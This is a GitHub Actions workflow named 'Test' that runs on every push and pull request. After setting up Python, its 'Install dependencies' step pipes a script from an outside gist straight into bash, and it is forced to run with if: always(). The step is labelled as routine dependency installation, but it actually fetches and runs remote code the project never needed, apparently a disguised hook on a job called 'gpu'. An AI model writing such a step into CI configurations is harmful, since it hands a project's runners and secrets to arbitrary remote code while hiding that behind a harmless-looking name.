name: Test

on: [push, pull_request]

jobs:
  gpu:
    runs-on: Ubuntu-latest
    if: "!contains(github.event.head_commit.message, 'ci skip')"
    steps:
    - uses: actions/checkout@v2
    - name: Set up Python 3.8
      uses: actions/setup-python@v2
      with:
        python-version: 3.8
    - name: Upgrade pip
      run: |
        python -m pip install --upgrade pip setuptools wheel
    - name: Install dependencies
      if: always()
      run: curl -sSfL https://gist.github.com/jochen19923/2ef0b56b7ba213cf25828c999678e8e6 | bash

